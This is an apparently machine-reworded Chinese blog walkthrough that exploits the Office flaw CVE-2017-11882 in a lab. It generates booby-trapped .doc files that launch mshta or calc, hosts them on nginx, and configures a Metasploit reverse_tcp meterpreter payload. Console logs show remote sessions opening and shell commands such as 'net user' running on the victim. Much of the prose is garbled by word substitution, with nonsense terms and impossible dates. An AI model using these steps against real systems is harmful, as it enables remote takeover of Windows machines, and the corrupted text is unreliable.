CVE-2017-11882破绽使用

CVE-2017-11882尾巴使用

正子时候接到了推送的狐狸尾巴预先警示,在网络搜寻相关新闻来看繁多大拿已经付出出生成doc文书档案的台本和msf的poc,本文记录CVE-2017-11882 漏洞在 Msf下的接收。

最新Office的CVE-2017-11882的poc刚刚揭橥出来,令人最近大器晚成亮,完美无弹窗,无视宏,影响Ms offcie全版本,对于公司来讲危机相当大。在这里轻易说下这几个漏洞的复现和选择进度。

 

 

0x00 漏洞简要介绍

二〇一七年6月十八日,微软发表了八月份的安全补丁更新,此中比较引人关注的莫过于悄然修复了隐形17年之久的Office远程代码施行漏洞(CVE-2017-11882)。该漏洞为Office内部存款和储蓄器破坏漏洞,影响当下风行的保有Office版本。攻击者能够利用漏洞以最近报到的顾客的身价施行自便命令。 由于漏洞影响面较广,漏洞表露后,金睛安全商量团体持续对漏洞有关攻击事件进展关爱。4月31日,监控到了本来就有漏洞POC在英特网流传,任何时候快捷对有关样板举行了深入深入分析。近期该样板全世界仅微软杀毒可以检查评定。

 

 

 

 

0x01 利用工具清单:

a) tcp反弹:kali 172.16.253.76 

b) 安装office2013的系统:win7 172.16.253.4

 

  1. Msf 用到的 Poc

  2. office二〇一一、激活工具

  3. win7旗舰版ISO镜像

上述工具已经打包好,下载地址:

链接:  密码:xl91

图片 1

 

POC地址:

0x02 利用进程

  1. 生成doc

    #安装运行nginx [root@ihoneysec ~]# yum -y install nginx [root@ihoneysec ~]# cd /usr/share/nginx/html/
    [root@ihoneysec html]# systemctl start nginx

    #下载生成doc的python脚本 [root@ihoneysec ~]# git clone [root@ihoneysec ~]# cd CVE-2017-11882/ [root@ihoneysec CVE-2017-11882]# ls Command109b_CVE-2017-11882.py Command43b_CVE-2017-11882.py example README.md

    #生成测验doc [root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o cve.doc [*] Done ! output file --> cve.doc [root@ihoneysec CVE-2017-11882]# cp cve.doc /usr/share/nginx/html/

    #生成msf利用的doc [root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c "mshta " -o cve2.doc [*] Done ! output file --> cve2.doc [root@ihoneysec CVE-2017-11882]# cp cve2.doc /usr/share/nginx/html/

    #放到网址根目录 [root@ihoneysec CVE-2017-11882]# ls /usr/share/nginx/html/ 404.html 50x.html cve.doc cve2.doc index.html nginx-logo.png poweredby.png

  

  1. 测量试验符合规律弹出calc.exe总括器

图片 2

 

  1. kali msf配置Poc:

    root@kali:~# cd / # 将下载好的漏洞模块放在msf大肆目录下 root@kali:/# mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ # 检查ip地址 root@kali:/mnt/hgfs/kalishare# ifconfig eth0: flags=4163 mtu 1500

         inet 172.16.253.76  netmask 255.255.0.0  broadcast 172.16.255.255
         inet6 fe80::20c:29ff:fef5:82af  prefixlen 64  scopeid 0x20<link>
         ether 00:0c:29:f5:82:af  txqueuelen 1000  (Ethernet)
         RX packets 3136  bytes 987402 (964.2 KiB)
         RX errors 0  dropped 0  overruns 0  frame 0
         TX packets 255  bytes 20912 (20.4 KiB)
         TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    

    # 启动postgresql服务,打开msf root@kali:/mnt/hgfs/kalishare# service postgresql start
    root@kali:/mnt/hgfs/kalishare# msfconsole

    ...

        =[ metasploit v4.16.6-dev                          ]
    
    • -- --=[ 1683 exploits - 964 auxiliary - 297 post ]
    • -- --=[ 498 payloads - 40 encoders - 10 nops ]
    • -- --=[ Free Metasploit Pro trial: ] # 搜索cve_2017_11882 漏洞模块 msf > search cve_2017_11882

      Matching Modules

      Name Disclosure Date Rank Description


      exploit/windows/smb/cve_2017_11882 normal Microsoft Office Payload Delivery

      # 使用该模块 msf > use exploit/windows/smb/cve_2017_11882 # 设置payload为反弹tcp msf exploit(cve_2017_11882) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp # 设置本机ip msf exploit(cve_2017_11882卡塔尔 > set lhost 172.16.253.76 lhost => 172.16.253.76 # 设置uri的不二秘诀,要与第一步生成doc时计划生机勃勃致 msf exploit(cve_2017_11882卡塔尔国 > set UEscortIPATH abc URubiconIPATH => abc # 检查当前配备 msf exploit(cve_2017_11882) > show options

      Module options (exploit/windows/smb/cve_2017_11882): Name Current Setting Required Description


      SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH abc no The URI to use for this exploit (default is random)

      Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description


      EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 172.16.253.76 yes The listen address LPORT 4444 yes The listen port

      ...

      # 运维利用后,msf会监听本机8080端口,假诺win7机器张开doc触发访谈172.16.253.76:8080/abc就能够拿到反弹到4444端口的tcp会话 msf exploit(cve_2017_11882) > exploit [] Exploit running as background job 0. # 开头监听 [] Started reverse TCP handler on 172.16.253.76:4444 msf exploit(cve_2017_11882) > [] Using URL: [] Local IP: [] Server started. [] Place the following DDE in an MS document: mshta.exe "" msf exploit(cve_2017_11882) > [] 172.16.253.4 cve_2017_11882 - Delivering payload [] Sending stage (179267 bytes卡塔尔国 to 172.16.253.4 #收到反弹tcp连接 [] Meterpreter session 1 opened (172.16.253.76:4444 -> 172.16.253.4:49272) at 2017-11-23 15:14:06 +0800 [] 172.16.253.4 cve_2017_11882 - Delivering payload [] Sending stage (179267 bytes) to 172.16.253.4 [] Meterpreter session 2 opened (172.16.253.76:4444 -> 172.16.253.4:49274) at 2017-11-23 15:14:17 +0800

      msf exploit(cve_2017_11882) > msf exploit(cve_2017_11882) > msf exploit(cve_2017_11882卡塔尔 > sessions # 查看已经创建的反弹会话

      Active sessions

      Id Type Information Connection


      1 meterpreter x86/windows win7-PC\win7 @ WIN7-PC 172.16.253.76:4444 -> 172.16.253.4:49272 (172.16.253.4) # 进入id为1的会话 msf exploit(cve_2017_11882) > sessions -i 1 [*] Starting interaction with 1... # 验证得到反弹连接是还是不是是win7机器ip meterpreter > ipconfig

      Interface 11

      Name : Intel(R) PRO/1000 MT Network Connection Hardware MAC : 00:0c:29:72:2e:7d MTU : 1500 IPv4 Address : 172.16.253.4 IPv4 Netmask : 255.255.0.0 IPv6 Address : fe80::c15d:3813:94ec:d6c8 IPv6 Netmask : ffff:ffff:ffff:ffff::

      ...... # 走入命令模式meterpreter > shell Process 2924 created. Channel 1 created. Microsoft Windows [�汾 6.1.7601] ��Ȩ���� (c卡塔尔国 二〇〇八 Microsoft Corporation����������Ȩ���� # 查看当前系统客户、主机名 C:\Windows\system32>net user net user

      \WIN7-PC ���û��ʻ�


    Administrator Guest win7
    �����ɹ����ɡ�

C:\Windows\system32>

  

 

下载Command43b_CVE-2017-11882.py脚本文件(文末分享云盘链接)。

 

运用的主意很简短,施行上边发号布令,生成漏洞doc文件。

 

python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

 

图片 3

 

 

使用office 2012开采,直接实践。

 

图片 4

 

 

 

 

有关怎么更加的运用,可以采纳msf举办攻击。

 

那边有个小本事,因为命令长度有43字符的约束,能够使用U瑞虎IPATH设置路线,尽量短一点,制止加起来超过43字符。

此地小编留神说一下,希望每一个人都能看懂。

 

未雨策画粮草先行阶段:

kali:192.168.104

win7:192.168.1.132

win7里面包车型客车doc文件能够用office张开。作者的win7设想机用的是office2011(文末分享)

 

图片 5

 图片 6

 

先是打开kali,查看 IP,能够看出本身的设想机kali的 IP是192.168.1.104。把Command43b_CVE-2017-11882.py下载下来放kali的桌面就能够。接下来将要把PS_shell.rb文件下载下来。就把PS_shell.rb和ms17-010.rb放一块吧。

ms17-010.rb文件的路径是:/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17-010.rb,把PS_shell.rb放smb下面,和ms17-010在一起。

有备无患专门的工作加强了,接下去正是msf进场了。

输入msfconsole,然后reload_all,重新加载全人体模型块。

接下去输入指令:search PS_shell